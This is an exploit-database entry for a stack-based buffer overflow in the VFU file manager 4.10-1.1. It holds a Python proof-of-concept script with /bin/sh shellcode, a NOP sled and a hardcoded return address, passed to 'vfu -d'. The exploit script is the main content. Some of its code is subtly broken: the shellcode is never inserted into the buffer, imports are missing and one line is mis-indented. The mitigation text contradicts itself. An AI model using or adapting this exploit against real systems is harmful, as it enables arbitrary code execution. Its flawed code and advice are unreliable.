VFU v4.10-1.1 Stack-Based Buffer Overflow

vendor:

VFU

by:

Juan Sacco

7,5

CVSS

HIGH

Stack-Based Buffer Overflow

119

CWE

Product Name: VFU

Affected Version From: VFU v4.10-1.1

Affected Version To: VFU v4.10-1.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:vfu:vfu:4.10-1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: GNU/Linux - Debian Wheezy

2013

VFU v4.10-1.1 Stack-Based Buffer Overflow

VFU v4.10-1.1 is prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Mitigation:

Upgrade to the latest version of VFU v4.10-1.1

Source

Exploit-DB raw data:

# Exploit Author: Juan Sacco - http://www.exploitpack.com
<jsacco@exploitpack.com>
# Tested on: GNU/Linux - Debian Wheezy
# Description: VFU v4.10-1.1 is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker can exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: VFU v4.10-1.1 ( Latest version ) -
http://cade.datamax.bg/vfu/
# Debian package: https://packages.debian.org/wheezy/vfu

buffersize =  803
nopsled = "\x90"
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x10\xf0\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip

try:
   subprocess.call(["vfu -d", buffer])
except OSError as e:
   if e.errno == os.errno.ENOENT:
       print "VFU not found!"
   else:
   print "Error executing exploit"
   raise